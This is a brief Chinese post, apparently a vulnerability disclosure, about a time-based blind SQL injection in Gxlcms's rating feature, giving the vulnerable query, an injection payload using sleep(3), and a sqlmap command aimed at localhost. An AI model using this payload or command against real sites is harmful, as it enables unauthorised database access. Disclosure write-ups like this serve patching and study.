Gxlcms 最新版下载链接
http://bbs.gxlcms.com/article/1
安装后需要进后台发表一篇作品
发表完成后注入在前台浏览作品的评分功能处
发表完成后注入在前台浏览作品的评分功能处
此时sql语句为
SELECT `ting_gold` FROM `gxl_ting` WHERE ( ting_id=’22’ ) LIMIT 1
其中ting_id=的值我们可控并且没有对此处进行单引号过滤
(Get,Post访问都可行)
此时sql语句为:
SELECT `ting_gold` FROM `gxl_ting` WHERE ( ting_id=’22’) and sleep(3) #’ ) LIMIT 1
可以看到成功闭合,来丢到sqlmap里
sqlmap -u localhost//index.php?s=Home-Comm-getcomm-id-22 –technique T
-T设置为时间盲注
$_GET[‘id’]传进来然后直接查询的数据库导致的注入
附:
文本:ADminSS
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论